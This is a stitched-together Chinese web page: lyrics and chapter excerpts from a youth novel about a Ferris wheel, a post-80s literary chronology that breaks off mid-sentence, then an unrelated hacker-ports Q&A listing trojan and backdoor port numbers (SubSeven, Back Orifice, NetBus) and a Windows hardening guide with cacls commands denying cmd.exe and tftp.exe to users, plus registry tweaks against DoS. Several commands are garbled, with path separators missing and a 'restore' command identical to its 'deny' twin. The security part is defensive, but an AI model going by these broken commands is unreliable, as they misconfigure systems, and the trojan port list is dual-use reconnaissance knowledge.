三年光阴覆盖山脉变海岸 浮云暖 芦苇浅
四季上演飞鸟飞过换日线 天高远 请许愿
四面来风记忆记得那一年 你轻轻 闭上眼
我习惯陪你悲伤 陪你沉默 陪你无聊 陪你面对光阴如刻刀
我习惯因你沮丧 因你紧张 因你自豪 因为你骄傲得不得了
我习惯陪你等车 陪你听歌 陪你舞蹈 陪你挑选朴素的花草
也习惯因你伤心 因你暗淡 因你闪耀 因为你心跳得不得了
回忆是素描 一张一张烧掉
你在哪儿 不知道
心在哪儿 不重要
拾月。
独白:那些回忆里的事情……
那些回忆里的事情
在多年后依然清晰
那一首做悲伤的歌
直到现在一直记得
十月:我和曾经的我们
时光如水慢慢荡漾 你和谁捉过迷藏
日暮停车场 灯火闪亮
清晨旧操场 空空荡荡
人山人海 手握着风筝等待
风筝断线落在夕阳之外
翻山越海 纸飞机飞不起来
我们分离散落五湖四海
时光在我心上流淌 我和你捉过迷藏
幸福游乐场 灯火辉煌
旧照片 放在相框
年轻时的理想飞扬 把悲伤扛在肩膀
用微笑点亮 来路苍凉
用拥抱抵抗 去路风霜
是否有过 一首最悲伤的歌
在夜里无止尽地反复着
谁曾唱过 那首我写下的歌
催动情绪像荒草满山坡时光在我心上流淌 我和你捉过迷藏
幸福游乐场 灯火辉煌
旧照片 放在相框
年轻时的理想飞扬 把悲伤扛在肩膀
用微笑点亮 来路苍凉
用拥抱抵抗 去路风霜
lalala......
[关 于 我 所 知 道 的 你 们]
孤独的颜悦:
一个孤独而安静的女孩,和陌生人接触会觉得恐慌!
因为爱好看书而结识了隔壁班的男孩姚望。与姚望的接触,让她仿佛看到了同类。
悲伤的姚望:
一个看似开心其实内心悲伤的人。
他是所有人眼里的好学生----一个勇敢坚强的人。事实上,他内心的阴暗只有颜悦能懂!
幸福而天真的童画:
拥有快乐的家庭,所以性格开朗,相信一切的美好,同时希望用自己的美好感染悲伤的姚望。
可姚望最终选择了同类人颜悦。童画也会变成悲伤的人吗?
傻瓜一样的钟城:
与童画从小一块儿长大,一直默默的守候在她的身边。
希望有一天童画能够回头看到身后的他,然而他始终等候在黑暗中……
Chapter01 我是说故事的人
......
有些事情一直刻在大脑里面。把大脑的千沟万壑全部展开,摊平,像一张巨大的纸,
上面是密密麻麻的剧情和台词。有很多的时间,很多的地点,很多的人,
都可以让我讲出这个故事。可是,总是有莫名其妙的原因让我张开口却像个不会说话的玩偶。
玩偶是最孤单的人。因为小孩孤单的时候还有玩偶陪。玩偶孤单的时候没人陪。
......
chapter02 颜悦是孤单的人
......
里面有一段话是说,孤单像是一把没有开锋的刀,钝重的刀口在脖子上随光阴岁月来来回回,
发出不轻不重不急不缓的疼,直到我们忘记了什么才是疼。
这是在说我么?
就像我习惯了在黄昏的时候站在空旷无人的操场,耳边是遥远的风声,
闻到的是操场边双杠生锈的味道。茂盛的荒草像是要长满一整个世界。
就像我习惯了独自排队买票,独自捧着爆米花看一场伤心的电影。为别人的故事大哭大笑。
直到电影谢幕灯光亮起,所有刚刚沉没在黑暗中的脸全部浮现出具体的轮廓和五官。
我又一瞬间回到自己无声的世界。
......
Chapter03 童画是幸福而天真的人
......
我记得那天他对我说这些话的时候是在游乐场里,学校组织的游园会。
我和他被人群挤来挤去地进了摩天轮的同一个格子里。
在摩天轮转到最顶上的时候,他在我旁边突然笑了,他说,天使在上面呢。
......
Chapter04 钟城是傻瓜一样的人
......
像个最忠实的观众,看着她的生命在黑暗的电影院里播放,我在座位中间,
有时候微笑,有时候哭泣,而最终看到她和她的那个他在一起。我是应该站起来鼓掌?
还是应该在黑暗中感动得流泪呢?
......
Chapter05 他们是两个人
......
在摩天轮上。我总是觉得姚望是天使。风从遥远的地方吹过来。
然后他的背后就长出了温柔的翅膀。
他说,谢谢你陪我一起摇曳。
......
Chapter06 颜悦是第三个人
......
我忘记了是在安徒生还是格林的童话里,有一篇童话开篇就是“山和峡谷一定是会相逢的,
就像有些人和有些人也是一定会相逢的”。后来我把这句话抄在墙壁上,我用铅笔划得很清楚。
很多个睡不着的晚上,我就在墙壁上一笔一笔地把这句话重新描一遍,就像小时候临摹钢笔字帖一样。
......
Chapter07 姚望是悲伤的人
......
我喜欢《关于莉莉周的一切》那部电影。
我喜欢莲见雄一带着耳机站在广阔的麦田里沉默不语。
我喜欢看到青猫在键盘上不断地输入菲力亚菲力亚菲力亚。
......
Chapter08 钟城是转身就可以看见的人
......
我们都是这样长大的。
恋爱。失恋。痛苦。成长。
曾经以为永远不会忘记的歌曲,却在填写毕业纪念册上“最喜欢的歌”那一栏时,
被我们填上了那个时候新喜欢上的歌。
曾经看到哭泣的电影,到后来连情节都不再记得。
我们都是这样一边受伤,一边勇敢地长大的。
......
Chapter09 童画是眺望摩天轮的人
......
只是那些我曾经养成的习惯,要用多么漫长的时光去改掉呢?
习惯了陪你孤单陪你寂寞陪你不说话。陪你站在山坡上看着荒草蔓延成遗迹一样的大海。
陪你在摩天轮上飘摇过一圈又一圈。陪你在雨里奔跑。
陪你在空旷无人的操场放飞了一个又一个风筝。有些一直飞着。有些断线掉进苍茫的人海。
那些曾经养成的习惯,像是烙印在身上的花纹。
他们说,洗去文身很痛很痛。那么,改掉习惯,也会很痛吧。
只希望时间是最伟大的治愈师。
......
Chapter10 你是听完故事的人
......
就像全世界的巫师突然一起扬起了手,挥舞着金漆将所有曾经暗淡的岁月全部擦亮。
他和她安静地站立在我们面前。
岁月不曾改变他们年轻的脸。就像岁月带不走那些昏黄的从前。
......
另:九月摩天轮MV。
小四试唱。感觉没有女声好听。可能不专业吧。但是旋律和歌词的无可挑剔的。有时间去听下原版,忘了谁唱的,颜悦还是童话。
mms://vod.tom.com/music/0508/jiuyuemtl.wmv
________
一整个城市的灯都闭上眼摩天轮独自转
一整个秋天的黄叶都掉完你独自撑着伞
两杯咖啡压着两张旧照片白拖鞋红地毯
两只金鱼游弋方寸天地间黑夜长白昼短
我习惯对你写信为你送药替你拍照随你登上摩天轮飘摇
也习惯独自排队独自买票独自骄傲独自环绕操场慢慢跑
我习惯学你说话学你微笑学你奔跑学你在阳台种满花草
也习惯独自旅行独自背包独自懊恼独自画你背影的素描
寂寞是心跳一声一声喧闹
你在哪儿不知道
三个秋天过去我就变勇敢摩天轮又三圈
三年光阴覆盖山脉变海岸浮云暖芦苇浅
四季上演飞鸟飞过换日线天高远请许愿
四面来风记忆记得那一年你轻轻闭上眼
我习惯陪你悲伤陪你沉默陪你无聊陪你面对光阴如刻刀
也习惯因你沮丧因你紧张因你自豪因为你骄傲的不得了
我习惯陪你等车陪你听歌陪你舞蹈陪你挑选朴素的花草
也习惯因你伤心因你黯淡因你闪耀以为你心跳的不得了
回忆是素描一张一张烧掉
你在哪儿不知道
心在哪儿不知道
80后不完全编年史
〔 作者:佚名 转贴 文章录入:海 〕
1998年许佳《我爱阳光》出版,在青少年读者群中产生了巨大的影响。
1999年一月《萌芽》杂志主办第一届新概念作文大赛,首届大赛一等奖的获得者韩寒时年17岁。作家出版社随后推出《新概念作文大赛作品集》,印刷60多万套。
年论坛《诗江湖》创办,成为下半身诗歌团体的先锋根据地,集结着后来成为80后文学概念的重要人物,春树、李傻傻、巫女琴丝、水晶珠链、他爱、余毒、刘脏、秦客、莫小邪、刘东灵、张进步、西毒何殇等开始从观看江湖厮杀到参与其中。
2000年7月,《诗参考》推出“80年代出生的诗人的诗”专栏, 等人首次亮相。
2000年12月1日韩寒《三重门》出版,迄今为止已发行逾110万册。
2001年1月1日水晶珠链(陈幻)《偏要是美女》一书出版,80后作为写手的叫卖招牌首次在大众媒体宣扬。
2001年初,安徽80后诗人创办民刊《冬至》,口号为“80年代出生诗人力作展”。
2001年6月,刘东灵、汤成伟在四川创办民刊《诗与思》,推出“80年代后少年诗人力作展”。
2001年10月,张进步、冯昭等在西安创办民刊《新文学观察》,专门发表80后写手作品,得到《诗潮》杂志主编刘川鼓励。
同年,四川熊盛荣、田乔直接创办《80年代》民刊。
2001年, 月“下半身”砸向旧文坛的首本杰作《诗江湖•先锋诗歌档案》一书,就有 等几位80在里面跟随大军。
2001年新概念获奖作品合集《白衣飘飘的年代》出版发行,“80后”一词被正式提出。
2002年开始,刘川主编的《诗潮》杂志开设“80后诗歌大展”栏目,同时老牌诗歌刊物《星星》诗刊等也开始扶持新生力量,同时,星星诗歌网开辟第一个具有官方文学意义的“中国80后论坛”,刘东灵、西毒何殇出任斑竹。
2002年5月春树《北京娃娃》出版,成为80后人群中的备受关注的先锋写手和“问题少女”。
2002年高三学生胡坚,把自己在网络上受到很高评价的三篇小说和一篇在《东方》杂志上发表的教育论文结集为《愤青时代》出版,公然声称出此书的目的是为了获得北大的特招,引起社会各界广泛关注。
2002年张悦然被《萌芽》网站评为“最富才情的女作家”。
2003年张悦然第一本书《葵花走失在1890》在作家出版社出版,由著名作家莫言写序推荐,并由一手捧红了“哈佛女孩”刘亦婷的知名出版人杨葵任责编,发行20余万册。
2003 月《诗林》推出“80后九人诗选”,并发布80后诗人泽婴《关于80后》一文。
2003《海峡.大校月刊》第 期连载“80后诗展”推出 等人作品。
2003《诗选刊》第9期推出“80年代出生的诗人作品展”,共有80余人入选。
2003年易术《陶瓷娃娃》出版,被《亚洲时报》指为“易碎品”,香港作家李碧华更赞扬其文字是“饱沾爱情之毒的苍白药丸”。
2003年甘世佳推出作品《十七岁开始苍老》。
2004年1月米米七月在天涯社区开始连载《他们都叫我小妖精》,经过一年周折,终于在2005年1月得以出版。
2004年年初孙睿《草样年华》在 出版社出版,发行30万册。
2004年2月2日,春树上了美国《时代》周刊亚洲版封面,与韩寒、曾经的黑客满舟、摇滚乐手李扬等4人被认为是中国八十年代后的代表,并与美国六十年代“垮掉的一代”相提并论。
2004张悦然《樱桃之远》在春风文艺出版社出版。
2004年2月郭敬明在《福布斯》发布的2004年“中国名人排行榜”上名列第93位,收入为160万元。
2004年2月李傻傻开始在天涯社区连载其长篇小说《红X》,并得到慕容雪村的赏识。
2004年易术高调出版长篇小说《孔雀》,因为涉足情色写作禁区又成为媒体关注的焦点。
2004年6月6日,郭敬明发起成立“岛工作室”,推出“岛”系列读物。
2004年7月易术长篇小说《再见萤火虫》在《萌芽》上连载。
2004年《羊城晚报》刊出《80后人气排行榜》。
2004年 月张悦然以其作品《十爱》获得“2004年度最具潜力新人奖”。
2004下半年《十少年作家批判书》热炒。
2004年12月法院判决郭敬明《梦里花落知多少》抄袭庄羽的《圈里圈外》。《梦里花落知多少》一书的出版者春风文艺出版社背上了“袒护抄袭”的指责和共同赔偿20万元的债务。
2004由何睿、刘一寒主编的《我们,我们——80后的盛宴》一书在中国文联出版公司出版。
2004年12月22日,湖南文艺出版社在广西阳朔西街建立全国首个青春文学创作基地。其社长刘
参考资料:http://www.4277.com/forum/topic.asp?TOPIC_ID=275292FORUM_ID=151CAT_ID=37Topic_Title=迷藏Forum_Title=视听生活
求教:黑客一般都是怎么攻击各种端口?
黑客常用端口(实际上每个端口黑客都会想办法利用的)
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP
说明:消息传输代理。
端口:113
服务:Authentication Service
说明:这是一个许多计算机上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器,尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,将会看到许多这个端口的连接请求。记住,如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。
端口:119
服务:Network News Transfer Protocol
说明:NEWS新闻组传输协议,承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送SPAM。
端口:135
服务:Location Service
说明:Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX
111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point
mapper注册它们的位置。远端客户连接到计算机时,它们查找end-point
mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange
Server吗?什么版本?还有些DOS攻击直接针对这个端口。
端口:137
说明:SQL Named Pipes encryption over other protocols name
lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name
lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins
Proxy都用这个端口。
端口:137、138、139
服务:NETBIOS Name Service
说明:其中137、138是UDP端口,当通过网上邻居传输文件时用这个端口。而139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS
Regisrtation也用它。
端口:143
服务:Interim Mail Access Protocol v2
说明:和POP3的安全问题一样,许多IMAP服务器存在有缓冲区溢出漏洞。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后,这些漏洞变的很流行。这一端口还被用于IMAP2,但并不流行。
端口:161
服务:SNMP (Simple Network Management Protocol) (简单网络管理协议)
说明:SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中,通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。
端口:162
说明:SNMP Trap(SNMP陷阱)
端口:177
服务:X Display Manager Control Protocol
说明:许多入侵者通过它访问X-windows操作台,它同时需要打开6000端口。
端口:389
服务:LDAP、ILS
说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
端口:443
服务:Https
说明:网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP。
端口:445
说明:Common Internet File System(CIFS)(公共Internet文件系统)
端口:456
服务:[NULL]
说明:木马HACKERS PARADISE开放此端口。
端口:464
说明:Kerberos kpasswd(v5)。另外TCP的464端口也是这个用途。
端口:500
说明:Internet Key Exchange(IKE)(Internet密钥交换)
端口:513
服务:Login,remote login
说明:是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。
端口:544
服务:[NULL]
说明:kerberos kshell
端口:548
服务:Macintosh,File Services(AFP/IP)
说明:Macintosh,文件服务。
端口:553
服务:CORBA IIOP (UDP)
说明:使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。
端口:555
服务:DSF
说明:木马PhAse1.0、Stealth Spy、IniKiller开放此端口。
端口:568
服务:Membership DPA
说明:成员资格 DPA。
端口:569
服务:Membership MSN
说明:成员资格 MSN。
端口:635
服务:mountd
说明:Linux的mountd
Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住mountd可运行于任何端口(到底是哪个端口,需要在端口111做portmap查询),只是Linux默认端口是635,就像NFS通常运行于2049端口。
端口:636
服务:LDAP
说明:SSL(Secure Sockets layer)
端口:666
服务:Doom Id Software
说明:木马Attack FTP、Satanz Backdoor开放此端口
端口:993
服务:IMAP
说明:SSL(Secure Sockets layer)
TCP 7=Echo
TCP 20=FTP Data
TCP 21=Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan,
Invisible FTP, Larva, WebEx, WinCrash
TCP 23=Telnet, Tiny Telnet Server (= TTS)
TCP 25=SMTP, Ajan, Antigen, Email Password Sender, Happy 99, Kuang2,
ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
TCP 31=Agent 31, Hackers Paradise, Masters Paradise
TCP 41=DeepThroat
TCP 43=WHOIS
TCP 53=DNS,Bonk (DOS Exploit)
TCP 59=DMSetup
TCP 70=Gopher
TCP 79=Firehotcker, Finger
TCP 80=Http服务器, Executor, RingZero
TCP 99=Hidden Port
TCP 110=Pop3服务器, ProMail
TCP 113=Kazimas, Auther Idnet
TCP 119=Nntp, Happy 99
TCP 121=JammerKiller, Bo jammerkillah
TCP 137=NetBios-NS
TCP 138=NetBios-DGN
TCP 139=NetBios-SSN
TCP 143=IMAP
TCP 161=Snmp
TCP 162=Snmp-Trap
TCP 194=Irc
TCP 421=TCP Wrappers
TCP 456=Hackers paradise
TCP 531=Rasmin
TCP 555=Ini-Killer, Phase Zero, Stealth Spy
TCP 666=Attack FTP, Satanz Backdoor
TCP 808=RemoteControl
TCP 911=Dark Shadow
TCP 999=DeepThroat
TCP 1001=Silencer, WebEx
TCP 1010=Doly
TCP 1011=Doly
TCP 1012=Doly
TCP 1015=Doly
TCP 1024=NetSpy.698(YAI)
TCP 1025=NetSpy.698
TCP 1033=Netspy
TCP 1042=Bla
TCP 1045=Rasmin
TCP 1047=GateCrasher
TCP 1080=Wingate
TCP 1090=Xtreme, VDOLive
TCP 1170=Psyber Stream Server, Streaming Audio trojan
TCP 1234=Ultors
TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse
TCP 1245=VooDoo Doll
TCP 1269=Mavericks Matrix
TCP 1492=FTP99CMP(BackOriffice.FTP)
TCP 1509=Psyber Streaming Server
TCP 1600=Shivka-Burka
TCP 1807=SpySender
TCP 1981=Shockrave
TCP 1999=BackDoor, TransScout
TCP 2001=TrojanCow
TCP 2023=Ripper, Pass Ripper
TCP2115=Bugs
TCP 2140=Deep Throat, The Invasor
TCP 2155=Illusion Mailer
TCP 2283=HVL Rat5
TCP2565=Striker
TCP 2583=WinCrash
TCP 2600=Digital RootBeer
TCP2801=Phineas Phucker
TCP3024=WinCrash trojan
TCP 3128=RingZero
TCP 3129=Masters Paradise
TCP 3150=Deep Throat, The Invasor
TCP 3210=SchoolBus
TCP 3459=Eclipse 2000
TCP 3700=Portal of Doom
TCP 3791=Eclypse
TCP 4000=腾讯OICQ客户端
TCP 4092=WinCrash
TCP 4321=BoBo
TCP 4567=File Nail
TCP 4590=ICQTrojan
TCP 5000=Bubbel, Back Door Setup, Sockets de Troie
TCP 5001=Back Door Setup, Sockets de Troie
TCP 5011=One of the Last Trojans (OOTLT)
TCP 5031=Firehotcker
TCP 5190=ICQ Query
TCP 5321=Firehotcker
TCP 5400=Blade Runner, BackConstruction1.2
TCP 5401=Blade Runner
TCP 5402=Blade Runner
TCP 5550=Xtcp
TCP 5555=ServeMe
TCP 5556=BO Facil
TCP 5557=BO Facil
TCP 5569=Robo-Hack
TCP 5631=PCAnyWhere data
TCP 5714=Wincrash3
TCP 5742=WinCrash
TCP 6400=The Thing
TCP 6667=NT Remote Control
TCP 6669=Vampyre
TCP 6670=DeepThroat
TCP 6711=SubSeven
TCP 6771=DeepThroat
TCP 6776=BackDoor-G, SubSeven
TCP 6883=DeltaSource
TCP 6912=Shit Heep
TCP 6939=Indoctrination
TCP 6969=GateCrasher, Priority, IRC 3
TCP 6970=GateCrasher
TCP 7000=Remote Grab
TCP 7300=NetMonitor
TCP 7301=NetMonitor
TCP 7306=NetMonitor
TCP 7307=NetMonitor, ProcSpy
TCP 7308=NetMonitor, X Spy
TCP 7323=Sygate服务器端
TCP 7626=冰河
TCP 7789=Back Door Setup, ICKiller
TCP 8000=XDMA, 腾讯OICQ服务器端
TCP 8010=Logfile
TCP 8080=WWW 代理, Ring Zero
TCP 9400=InCommand
TCP 9401=InCommand
TCP 9402=InCommand
TCP 9872=Portal of Doom
TCP 9873=Portal of Doom
TCP 9874=Portal of Doom
TCP 9875=Portal of Doom
TCP 9876=Cyber Attacker
TCP 9878=TransScout
TCP 9989=Ini-Killer
TCP 10101=BrainSpy
TCP 10167=Portal Of Doom
TCP 10520=Acid Shivers
TCP 10607=Coma trojan
TCP 11000=Senna Spy
TCP 11223=Progenic
TCP 12076=Gjamer, MSH.104b
TCP 12223=Hack?9 KeyLogger
TCP 12345=GabanBus, NetBus, Pie Bill Gates, X-bill
TCP 12346=GabanBus, NetBus, X-bill
TCP 12361=Whack-a-mole
TCP 12362=Whack-a-mole
TCP 12631=WhackJob
TCP 13000=Senna Spy
TCP 16969=Priority
TCP 17300=Kuang2 The Virus
TCP 20000=Millennium II (GrilFriend)
TCP 20001=Millennium II (GrilFriend)
TCP 20034=NetBus 2 Pro
TCP 20203=Logged
TCP 20331=Bla
TCP 21544=Schwindler 1.82, GirlFriend
TCP 22222=Prosiak
TCP 23456=Evil FTP, Ugly FTP, WhackJob
TCP 23476=Donald Dick
TCP 23477=Donald Dick
TCP 27374=Sub Seven 2.0+
TCP 29891=The Unexplained
TCP 30029=AOL trojan
TCP 30100=NetSphere 1.27a, NetSphere 1.31
TCP 30101=NetSphere 1.31, NetSphere 1.27a
TCP 30102=NetSphere 1.27a, NetSphere 1.31
TCP 30103=NetSphere 1.31
TCP 30303=Sockets de Troie
TCP 30999=Kuang2
TCP 31336=Bo Whack
TCP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice,
DeepBO
TCP 31339=NetSpy DK
TCP 31666=BOWhack
TCP 31785=Hack Attack
TCP 31787=Hack Attack
TCP 31789=Hack Attack
TCP 31791=Hack Attack
TCP 33333=Prosiak
TCP 33911=Spirit 2001a
TCP 34324=BigGluck, TN
TCP 40412=The Spy
TCP 40421=Agent 40421, Masters Paradise.96
TCP 40422=Masters Paradise
TCP 40423=Masters Paradise.97
TCP 40426=Masters Paradise
TCP 47878=BirdSpy2
TCP 50505=Sockets de Troie
TCP 50766=Fore, Schwindler
TCP 53001=Remote Windows Shutdown
TCP 54320=Back Orifice 2000
TCP 54321=School Bus .69-1.11
TCP 60000=Deep Throat
TCP 61466=Telecommando
TCP 65000=Devil
UDP 1349=BO dll
UDP 2989=RAT
UDP 3801=Eclypse
UDP 10067=Portal of Doom
UDP 10167=Portal of Doom
UDP 26274=Delta Source
UDP 29891=The Unexplained
UDP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice,
DeepBO
UDP 31338=Back Orifice, NetSpy DK, DeepBO
UDP 31789=Hack aTack
UDP 31791=Hack aTack
UDP 47262=Delta Source
UDP 54321=Back Orifice 2000
黑客常用软件以及方法
http://www.baidu.com/s?ie=gb2312bs=%BA%DA%BF%CD%B3%A3%D3%C3%B6%CB%BF%DAsr=z=cl=3f=8wd=%BA%DA%BF%CD%B3%A3%D3%C3%C8%ED%BC%FEct=0
怎样防黑客及木马软件?
安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,启用比较好,但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.重命名来宾帐户guest [最好写一个自己能记住中文名]让黑客去猜解guest吧,而且还得删除这个帐户,后面有详细解释]
9.帐户.重命名系统管理员帐户[建议取中文名]
E计划.用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过终端允许登陆 删除Remote Desktop Users
F计划.终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
G计划.用户和组策略
打开管理工具
计算机管理.本地用户和组.用户
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不组了.分经验的(不管他.默认设置)
X计划.DIY策略[根据个人需要]
1.当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.
2.登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3.对匿名连接的额外限制
4.禁止按 alt+crtl+del
5.允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6.只有本地登陆用户才能访问cd-rom
7.只有本地登陆用户才能访问软驱
8.取消关机原因的提示
1、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
2、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
3、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
4、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9.禁止关机事件跟踪
开始“Start -”运行“ Run -输入”gpedit.msc “,在出现的窗口的左边部分,
选择 ”计算机配置“(Computer Configuration )- ”管理模板“
(Administrative Templates)- ”系统“(System),在右边窗口双击
“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),
点击然后“确定”(OK)保存后退出这样,你将看到类似于windows 2000的关机窗口
三、修改权限防止病毒或木马等破坏系统
winxp、windows2003以上版本适合本方法.
因为目前的木马抑或是病毒都喜欢驻留在system32目录下,如果我们用命令限制system32的写入和修改权限的话
那么,它们就没有办法写在里面了.看命令
A命令
cacls C:windowssystem32 /G administrator:R 禁止修改、写入C:windowssystem32目录
cacls C:windowssystem32 /G administrator:F 恢复修改、写入C:windowssystem32目录
呵呵,这样病毒等就进不去了,如果你觉得这个还不够安全,
还可以进行修改觉得其他危险目录,比如直接修改C盘的权限,但修改c修改、写入后,安装软件时需先把权限恢复过来才行
B命令
cacls C: /G administrator:R 禁止修改、写入C盘
cacls C: /G administrator:F 恢复修改、写入C盘
这个方法防止病毒,
如果您觉得一些病毒防火墙消耗内存太大的话
此方法稍可解决一点希望大家喜欢这个方法^_^
X命令
以下命令推荐给高级管理员使用[因为win版本不同,请自行修改参数]
cacls %SystemRoot%system32cmd.exe /E /D IUSR_ComSpec 禁止网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32cmd.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp32.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp32.exe
四、重要文件名加密[NTFS格式]
此命令的用途可加密windows的密码档,QQ密码档等等^.^
命令行方式
加密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /e 文件名(或文件夹名)”。
解密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /d 文件名(或文件夹名)”。
五、修改注册表防御D.D.O.S
在注册表HKLMSYSTEMCurrentControlSetServicesTcpipParameters中更改以下值可以帮助你防御一定强度的DoS攻击
SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0
NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0
KeepAliveTime REG_DWORD 300,000
PerformRouterDiscovery REG_DWORD 0
EnableICMPRedirects REG_DWORD 0
更多新的防御技巧请搜索其他信息,
由于本人不敢拿自己的硬盘开玩笑,所以没做实验... ...
六、打造更安全的防火墙
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。 本人现将自己所知道的端口公布如下(如果觉得还有危险需要过滤的,请联系本人:OICQ 13946296
端口 协议 应用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP协议
8(非端口) IP协议
那么,我们根据自己的经验,将下面的端口关闭
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[冲击波]
4489
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯OICQ会打开4000或者是8000端口,那么,我们只运行本机使用4000端口就行了
七、保护个人隐私
1、TT浏览器
选择用另外一款浏览器浏览网站.我推荐用TT,使用TT是有道理的.
TT可以识别网页中的脚本,JAVA程序,可以很好的抵御一些恶意的脚本等等,而且TT即使被感染,你删除掉又重新安装一个就是.[TT就是腾讯的浏览器](不过有些人喜欢用MyIE,因为我使用的时间和对他的了解不是很深吧,感觉不出他对安全方面有什么优势一_一~,希望支持MyIE的朋友不要揍我,否则我会哭... ...)
2、移动“我的文档”
进入资源管理器,右击“我的文档”,选择“属性”,在“目标文件夹”选项卡中点“移动”按钮,
选择目标盘后按“确定”即可。在Windows 2003中“我的文档”已难觅芳踪,桌面、开始等处都看不到了,
建议经常使用的朋友做个快捷方式放到桌面上。
3、移动IE临时文件
进入“开始→控制面板→Internet 选项”,在“常规”选项卡的“Internet 文件”栏里点“设置”按钮,
在弹出窗体中点“移动文件夹”按钮,选择目标文件夹后,点“确定”,在弹出对话框中选择“是”,
